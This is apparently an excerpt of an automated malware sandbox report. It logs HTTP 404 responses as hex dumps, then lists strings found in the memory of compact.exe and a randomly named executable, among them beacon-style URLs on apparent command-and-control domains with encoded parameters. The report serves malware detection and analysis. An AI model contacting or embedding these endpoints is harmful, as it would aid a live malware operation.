ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 16:00:31 GMTContent-Type: text/htmlContent-Length: 2814Connection: closeVary: Accept-EncodingLast-Modified: Tue, 07 Nov 2023 07:43:14 GMTETag: "afe-6098b1f8c138d"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:59:17 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:59:19 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:59:22 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:59:24 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1728X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6

Source: compact.exe, 0000000A.00000002.4574298276.0000000004F98000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003D28000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://3cubesinterior.in/n8zi/?Y6vp=3PLd8j&OdjTHtuX=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTX
Source: compact.exe, 0000000A.00000002.4574298276.0000000004950000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.00000000036E0000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://architect-usschool.com/s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwD
Source: compact.exe, 0000000A.00000002.4574298276.000000000449A000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.000000000322A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://epicbazaarhub.com/2769/?OdjTHtuX=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
